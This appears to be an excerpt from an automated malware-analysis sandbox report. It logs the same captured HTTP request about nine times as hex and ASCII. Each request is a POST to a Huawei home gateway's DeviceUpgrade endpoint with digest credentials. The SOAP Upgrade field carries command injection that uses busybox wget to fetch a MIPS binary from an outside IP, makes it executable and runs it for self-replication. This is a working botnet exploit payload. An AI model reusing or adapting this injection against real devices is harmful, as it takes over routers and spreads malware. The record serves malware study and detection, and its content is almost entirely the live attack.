52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
